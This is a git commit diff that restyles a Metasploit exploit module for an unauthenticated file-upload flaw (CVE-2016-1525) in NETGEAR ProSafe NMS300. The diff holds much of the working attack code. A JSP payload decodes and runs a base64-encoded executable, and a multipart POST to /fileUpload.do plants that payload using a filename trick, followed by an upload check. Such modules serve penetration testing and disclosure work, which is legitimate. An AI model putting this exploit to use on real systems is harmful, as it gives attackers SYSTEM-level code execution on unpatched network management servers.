Made style changes requested by OJ and others
This commit is contained in:
parent
1f4324f686
commit
044b12d3a4
|
@ -5,7 +5,7 @@
|
|||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
|
||||
The application has a file upload vulnerability that can be exploited by an
|
||||
unauthenticated remote attacker to execute code as the SYSTEM user.
|
||||
Two servlets are vulnerable, FileUploadController (located at
|
||||
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
|
||||
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
|
||||
1.1.0.13.
|
||||
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
|
||||
The application has a file upload vulnerability that can be exploited by an
|
||||
unauthenticated remote attacker to execute code as the SYSTEM user.
|
||||
Two servlets are vulnerable, FileUploadController (located at
|
||||
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
|
||||
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
|
||||
1.1.0.13.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -32,8 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2016-1525'],
|
||||
['US-CERT-VU', '777024'],
|
||||
['URL', 'TODO_GITHUB_URL'],
|
||||
['URL', 'TODO_FULLDISC_URL']
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 5 },
|
||||
'Platform' => 'win',
|
||||
|
@ -60,9 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'GET'
|
||||
})
|
||||
if res && res.code == 405
|
||||
return Exploit::CheckCode::Detected
|
||||
Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
base64_exe = Rex::Text.encode_base64(exe)
|
||||
payload_name = rand_text_alpha(rand(6)+3)
|
||||
|
||||
var_raw = rand_text_alpha(rand(8) + 3)
|
||||
var_ostream = rand_text_alpha(rand(8) + 3)
|
||||
var_buf = rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = rand_text_alpha(rand(8) + 3)
|
||||
var_tmp = rand_text_alpha(rand(8) + 3)
|
||||
var_path = rand_text_alpha(rand(8) + 3)
|
||||
var_proc2 = rand_text_alpha(rand(8) + 3)
|
||||
var_raw = 'a' + rand_text_alpha(rand(8) + 3)
|
||||
var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
|
||||
var_buf = 'c' + rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
|
||||
var_tmp = 'e' + rand_text_alpha(rand(8) + 3)
|
||||
var_path = 'f' + rand_text_alpha(rand(8) + 3)
|
||||
var_proc2 = 'e' + rand_text_alpha(rand(8) + 3)
|
||||
|
||||
jsp = %Q|
|
||||
<%@page import="java.io.*"%>
|
||||
|
@ -102,10 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
%>
|
||||
|
|
||||
|
||||
jsp = jsp.gsub(/\n/, '')
|
||||
jsp = jsp.gsub(/\t/, '')
|
||||
jsp = jsp.gsub(/\x0d\x0a/, "")
|
||||
jsp = jsp.gsub(/\x0a/, "")
|
||||
jsp.gsub!(/[\n\t\r]/, '')
|
||||
|
||||
return jsp
|
||||
end
|
||||
|
@ -115,9 +112,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jsp_payload = generate_jsp_payload
|
||||
|
||||
jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
|
||||
jsp_full_name = "null" + jsp_name + ".jsp"
|
||||
jsp_full_name = "null#{jsp_name}.jsp"
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(jsp_name, nil, nil, "form-data; name=\"name\"")
|
||||
post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
|
||||
post_data.add_part(jsp_payload,
|
||||
"application/octet-stream", 'binary',
|
||||
"form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
|
||||
|
@ -130,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => data,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
|
||||
})
|
||||
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name + ".jsp"}"/
|
||||
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
|
||||
print_status("#{peer} - Payload uploaded successfully")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
|
||||
|
|
Loading…
Reference in New Issue